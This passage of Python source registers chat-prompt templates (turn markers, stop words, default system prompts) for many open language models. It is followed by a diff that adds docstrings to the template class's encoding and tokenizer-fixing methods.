format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are MiMo, a helpful AI assistant engineered by Xiaomi.",
stop_words=["<|im_end|>"],
replace_eos=True,
thought_words=("<think>", "</think>"),
template_class=ReasoningTemplate,
)
# copied from qwen2vl
register_template(
name="mimo_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are MiMo, an AI assistant developed by Xiaomi.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
# copied from chatml template
register_template(
name="minicpm_v",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
default_system="You are a helpful assistant.",
mm_plugin=get_mm_plugin(name="minicpm_v", image_token="<image>", video_token="<video>"),
)
# copied from minicpm_v template
register_template(
name="minicpm_o",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
default_system="You are a helpful assistant. You can accept audio and text input and output voice and text.",
mm_plugin=get_mm_plugin(name="minicpm_v", image_token="<image>", video_token="<video>", audio_token="<audio>"),
)
register_template(
name="minimax1",
format_user=StringFormatter(
slots=[
"<beginning_of_sentence>user name=user\n{{content}}<end_of_sentence>\n<beginning_of_sentence>ai name=assistant\n"
]
),
format_assistant=StringFormatter(slots=["{{content}}<end_of_sentence>\n"]),
format_system=StringFormatter(
slots=["<beginning_of_sentence>system ai_setting=assistant\n{{content}}<end_of_sentence>\n"]
),
format_function=FunctionFormatter(slots=["{{content}}<end_of_sentence>\n"], tool_format="minimax1"),
format_observation=StringFormatter(
slots=[
"<beginning_of_sentence>tool name=tools\n{{content}}<end_of_sentence>\n<beginning_of_sentence>ai name=assistant\n"
]
),
format_tools=ToolFormatter(tool_format="minimax1"),
default_system="You are a helpful assistant.",
stop_words=["<end_of_sentence>"],
)
register_template(
name="minimax2",
format_user=StringFormatter(slots=["]~b]user\n{{content}}[e~[\n]~b]ai\n"]),
format_assistant=StringFormatter(slots=["{{content}}[e~[\n"]),
format_system=StringFormatter(slots=["]~!b[]~b]system\n{{content}}[e~[\n"]),
format_function=FunctionFormatter(slots=["{{content}}[e~[\n"], tool_format="minimax2"),
format_observation=StringFormatter(slots=["]~b]tool\n<response>{{content}}</response>[e~[\n]~b]ai\n"]),
format_tools=ToolFormatter(tool_format="minimax2"),
default_system="You are a helpful assistant. Your name is MiniMax-M2.1 and is built by MiniMax.",
stop_words=["[e~["],
template_class=ReasoningTemplate,
)
# mistral tokenizer v3 tekken
register_template(
name="ministral",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=Llama2Template,
)
# mistral tokenizer v3
register_template(
name="mistral",
format_user=StringFormatter(slots=["[INST] {{content}}[/INST]"]),
format_assistant=StringFormatter(slots=[" {{content}}", {"eos_token"}]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS] {{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS] {"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=Llama2Template,
)
# mistral tokenizer v7 tekken (copied from ministral)
register_template(
name="mistral_small",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["[SYSTEM_PROMPT]{{content}}[/SYSTEM_PROMPT]"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="pixtral", image_token="[IMG]"),
)
register_template(
name="ministral3",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=Llama2Template,
mm_plugin=get_mm_plugin(name="pixtral", image_token="[IMG]"),
)
register_template(
name="olmo",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>\n"]),
format_prefix=EmptyFormatter(slots=[{"eos_token"}]),
)
register_template(
name="openchat",
format_user=StringFormatter(slots=["GPT4 Correct User: {{content}}", {"eos_token"}, "GPT4 Correct Assistant:"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
register_template(
name="openchat-3.6",
format_user=StringFormatter(
slots=[
(
"<|start_header_id|>GPT4 Correct User<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>GPT4 Correct Assistant<|end_header_id|>\n\n"
)
]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|eot_id|>"],
)
# copied from chatml template
register_template(
name="opencoder",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
default_system="You are OpenCoder, created by OpenCoder Team.",
stop_words=["<|im_end|>"],
)
register_template(
name="paligemma",
format_user=StringFormatter(slots=["{{content}}\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="paligemma", image_token="<image>"),
template_class=Llama2Template,
)
# copied from gemma template
register_template(
name="paligemma_chat",
format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
format_observation=StringFormatter(
slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<end_of_turn>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="paligemma", image_token="<image>"),
template_class=Llama2Template,
)
register_template(
name="phi",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|end|>\n<|assistant|>\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}<|end|>\n"]),
stop_words=["<|end|>"],
replace_eos=True,
)
register_template(
name="phi_small",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|end|>\n<|assistant|>\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}<|end|>\n"]),
format_prefix=EmptyFormatter(slots=[{"<|endoftext|>"}]),
stop_words=["<|end|>"],
replace_eos=True,
)
register_template(
name="phi4",
format_user=StringFormatter(
slots=["<|im_start|>user<|im_sep|>{{content}}<|im_end|><|im_start|>assistant<|im_sep|>"]
),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>"]),
format_system=StringFormatter(slots=["<|im_start|>system<|im_sep|>{{content}}<|im_end|>"]),
stop_words=["<|im_end|>"],
replace_eos=True,
)
register_template(
name="phi4_mini",
format_user=StringFormatter(slots=["<|user|>{{content}}<|end|><|assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>"]),
format_system=StringFormatter(slots=["<|system|>{{content}}<|end|>"]),
format_tools=StringFormatter(slots=["<|tool|>{{content}}<|/tool|>"]),
stop_words=["<|end|>"],
replace_eos=True,
)
# copied from ministral template
register_template(
name="pixtral",
format_user=StringFormatter(slots=["[INST]{{content}}[/INST]"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS]{{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS]{"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="pixtral", image_token="[IMG]"),
template_class=Llama2Template,
)
# copied from chatml template
register_template(
name="qwen",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are Qwen, created by Alibaba Cloud. You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
)
# copied from qwen template
register_template(
name="qwen3",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
template_class=ReasoningTemplate,
)
# copied from qwen template
register_template(
name="qwen3_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
)
# copied from chatml template
register_template(
name="qwen2_audio",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_audio", audio_token="<|AUDIO|>"),
)
# copied from qwen template
register_template(
name="qwen2_omni",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_omni",
image_token="<|IMAGE|>",
video_token="<|VIDEO|>",
audio_token="<|AUDIO|>",
vision_bos_token="<|vision_bos|>",
vision_eos_token="<|vision_eos|>",
audio_bos_token="<|audio_bos|>",
audio_eos_token="<|audio_eos|>",
),
)
register_template(
name="qwen3_omni",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_omni", image_token="<|image_pad|>", video_token="<|video_pad|>", audio_token="<|audio_pad|>"
),
template_class=ReasoningTemplate,
)
register_template(
name="qwen3_omni_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_omni", image_token="<|image_pad|>", video_token="<|video_pad|>", audio_token="<|audio_pad|>"
),
)
# copied from qwen template
register_template(
name="qwen2_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
# copied from qwen template
register_template(
name="qwen3_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
# copied from qwen template
register_template(
name="qwen3_vl_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
register_template(
name="qwen3_5",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen3_5"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen3_5"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
register_template(
name="qwen3_5_nothink",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen3_5"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen3_5"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen3_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
register_template(
name="sailor",
format_user=StringFormatter(slots=["<|im_start|>question\n{{content}}<|im_end|>\n<|im_start|>answer\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
default_system=(
"You are an AI assistant named Sailor created by Sea AI Lab. "
"Your answer should be friendly, unbiased, faithful, informative and detailed."
),
stop_words=["<|im_end|>"],
)
register_template(
name="seed_coder",
format_user=StringFormatter(
slots=[{"bos_token"}, "user\n{{content}}", {"eos_token"}, {"bos_token"}, "assistant\n"]
),
format_system=StringFormatter(slots=[{"bos_token"}, "system\n{{content}}", {"eos_token"}]),
default_system=(
"You are an AI programming assistant, utilizing the Seed-Coder model, developed by ByteDance Seed, "
"and you only answer questions related to computer science. For politically sensitive questions, "
"security and privacy issues, and other non-computer science questions, you will refuse to answer.\n\n"
),
)
# copied from seed_coder
register_template(
name="seed_oss",
format_user=StringFormatter(
slots=[{"bos_token"}, "user\n{{content}}", {"eos_token"}, {"bos_token"}, "assistant\n"]
),
format_system=StringFormatter(slots=[{"bos_token"}, "system\n{{content}}", {"eos_token"}]),
format_function=FunctionFormatter(slots=[{"bos_token"}, "\n{{content}}", {"eos_token"}], tool_format="seed_oss"),
format_tools=ToolFormatter(tool_format="seed_oss"),
template_class=ReasoningTemplate,
thought_words=("<seed:think>", "</seed:think>"),
)
register_template(
name="smollm",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
)
register_template(
name="smollm2",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
default_system="You are a helpful AI assistant named SmolLM, trained by Hugging Face.",
)
register_template(
name="solar",
format_user=StringFormatter(slots=["### User:\n{{content}}\n\n### Assistant:\n"]),
format_system=StringFormatter(slots=["### System:\n{{content}}\n\n"]),
efficient_eos=True,
)
register_template(
name="starchat",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|end|>\n<|assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|end|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}<|end|>\n"]),
stop_words=["<|end|>"],
)
register_template(
name="telechat2",
format_user=StringFormatter(slots=["<_user>{{content}}<_bot>"]),
format_system=StringFormatter(slots=["<_system>{{content}}"]),
default_system=(
"你是中国电信星辰语义大模型,英文名是TeleChat,你是由中电信人工智能科技有限公司和中国电信人工智能研究院(TeleAI)研发的人工智能助手。"
),
)
register_template(
name="vicuna",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
replace_jinja_template=True,
)
register_template(
name="video_llava",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="video_llava", image_token="<image>", video_token="<video>"),
)
register_template(
name="xuanyuan",
format_user=StringFormatter(slots=["Human: {{content}} Assistant:"]),
default_system=(
"以下是用户和人工智能助手之间的对话。用户以Human开头,人工智能助手以Assistant开头,"
"会对人类提出的问题给出有帮助、高质量、详细和礼貌的回答,并且总是拒绝参与与不道德、"
"不安全、有争议、政治敏感等相关的话题、问题和指示。\n"
),
)
# copied from chatml template
register_template(
name="yi",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
)
register_template(
name="yi_vl",
format_user=StringFormatter(slots=["### Human: {{content}}\n### Assistant:"]),
format_assistant=StringFormatter(slots=["{{content}}\n"]),
default_system=(
"This is a chat between an inquisitive human and an AI assistant. "
"Assume the role of the AI assistant. Read all the images carefully, "
"and respond to the human's questions with informative, helpful, detailed and polite answers. "
"这是一个好奇的人类和一个人工智能助手之间的对话。假设你扮演这个AI助手的角色。"
"仔细阅读所有的图像,并对人类的问题做出信息丰富、有帮助、详细的和礼貌的回答。\n\n"
),
stop_words=["###"],
efficient_eos=True,
mm_plugin=get_mm_plugin(name="llava", image_token="<image>"),
)
register_template(
name="youtu",
format_user=StringFormatter(slots=["<|User|>{{content}}<|Assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>"]),
format_system=StringFormatter(slots=["{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="default"),
format_observation=StringFormatter(slots=["<tool_response>\n{{content}}\n</tool_response><|Assistant|>"]),
format_tools=ToolFormatter(tool_format="default"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|end_of_text|>"],
replace_eos=True,
template_class=ReasoningTemplate,
)
register_template(
name="youtu_vl",
format_user=StringFormatter(
slots=["<|begin_of_text|>user\n{{content}}<|end_of_text|>\n<|begin_of_text|>assistant\n"]
),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>\n"]),
format_system=StringFormatter(slots=["<|begin_of_text|>system\n{{content}}<|end_of_text|>\n"]),
default_system="You are a helpful assistant.",
stop_words=["<|end_of_text|>"],
mm_plugin=get_mm_plugin(name="youtu_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
)
register_template(
name="yuan",
format_user=StringFormatter(slots=["{{content}}", {"token": "<sep>"}]),
format_assistant=StringFormatter(slots=["{{content}}<eod>\n"]),
stop_words=["<eod>"],
)
register_template(
name="zephyr",
format_user=StringFormatter(slots=["<|user|>\n{{content}}", {"eos_token"}, "<|assistant|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}", {"eos_token"}]),
default_system="You are Zephyr, a helpful assistant.",
)
# copied from glm4_7 template
register_template(
name="aeva",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4_moe"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
default_system=(
"You are an AI assistant named Aeva created by Zongzhi Lou. "
"Your answer should be friendly, unbiased, faithful, informative and detailed."
),
stop_words=["<|user|>", "<|observation|>"],
thought_words=("<think>", "</think>"),
efficient_eos=True,
template_class=Glm47ReasoningTemplate,
) | --- +++ @@ -63,6 +63,7 @@ system: Optional[str] = None,
tools: Optional[str] = None,
) -> tuple[list[int], list[int]]:
+ r"""Return a single pair of token ids representing prompt and response respectively."""
encoded_messages = self._encode(tokenizer, messages, system, tools)
prompt_ids = []
for encoded_ids in encoded_messages[:-1]:
@@ -78,13 +79,16 @@ system: Optional[str] = None,
tools: Optional[str] = None,
) -> list[tuple[list[int], list[int]]]:
+ r"""Return multiple pairs of token ids representing prompts and responses respectively."""
encoded_messages = self._encode(tokenizer, messages, system, tools)
return [(encoded_messages[i], encoded_messages[i + 1]) for i in range(0, len(encoded_messages), 2)]
def extract_tool(self, content: str) -> Union[str, list["FunctionCall"]]:
+ r"""Extract tool message."""
return self.format_tools.extract(content)
def get_stop_token_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
+ r"""Return stop token ids."""
stop_token_ids = {tokenizer.eos_token_id}
for token in self.stop_words:
stop_token_ids.add(tokenizer.convert_tokens_to_ids(token))
@@ -92,16 +96,20 @@ return list(stop_token_ids)
def add_thought(self, content: str = "") -> str:
+ r"""Add empty thought to assistant message."""
return f"{self.thought_words[0]}{self.thought_words[1]}" + content
def remove_thought(self, content: str) -> str:
+ r"""Remove thought from assistant message."""
pattern = re.compile(f"{re.escape(self.thought_words[0])}(.*?){re.escape(self.thought_words[1])}", re.DOTALL)
return re.sub(pattern, "", content).lstrip("\n")
def get_thought_word_ids(self, tokenizer: "PreTrainedTokenizer") -> list[int]:
+ r"""Get the token ids of thought words."""
return tokenizer.encode(self.add_thought(), add_special_tokens=False)
def _convert_elements_to_ids(self, tokenizer: "PreTrainedTokenizer", elements: "SLOTS") -> list[int]:
+ r"""Convert elements to token ids."""
token_ids = []
for elem in elements:
if isinstance(elem, str):
@@ -126,6 +134,11 @@ system: Optional[str],
tools: Optional[str],
) -> list[list[int]]:
+ r"""Encode formatted inputs to pairs of token ids.
+
+ Turn 0: prefix + system + query resp
+ Turn t: query resp.
+ """
system = system or self.default_system
encoded_messages = []
for i, message in enumerate(messages):
@@ -156,6 +169,7 @@
@staticmethod
def _add_or_replace_eos_token(tokenizer: "PreTrainedTokenizer", eos_token: str) -> None:
+ r"""Add or replace eos token to the tokenizer."""
if tokenizer.eos_token == eos_token:
return
@@ -171,6 +185,7 @@ logger.warning_rank0("New tokens have been added, make sure `resize_vocab` is True.")
def fix_special_tokens(self, tokenizer: "PreTrainedTokenizer") -> None:
+ r"""Add eos token and pad token to the tokenizer."""
stop_words = self.stop_words
if self.replace_eos:
if not stop_words:
@@ -199,10 +214,12 @@
@staticmethod
def _jinja_escape(content: str) -> str:
+ r"""Escape single quotes in content."""
return content.replace("'", r"\'")
@staticmethod
def _convert_slots_to_jinja(slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content") -> str:
+ r"""Convert slots to jinja template."""
slot_items = []
for slot in slots:
if isinstance(slot, str):
@@ -224,6 +241,7 @@ return " + ".join(slot_items)
def _get_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> str:
+ r"""Return the jinja template."""
prefix = self._convert_slots_to_jinja(self.format_prefix.apply(), tokenizer)
system = self._convert_slots_to_jinja(self.format_system.apply(), tokenizer, placeholder="system_message")
user = self._convert_slots_to_jinja(self.format_user.apply(), tokenizer)
@@ -251,6 +269,7 @@ return jinja_template
def fix_jinja_template(self, tokenizer: "PreTrainedTokenizer") -> None:
+ r"""Replace the jinja template in the tokenizer."""
if tokenizer.chat_template is None or self.replace_jinja_template:
try:
tokenizer.chat_template = self._get_jinja_template(tokenizer)
@@ -261,6 +280,7 @@ def _convert_slots_to_ollama(
slots: "SLOTS", tokenizer: "PreTrainedTokenizer", placeholder: str = "content"
) -> str:
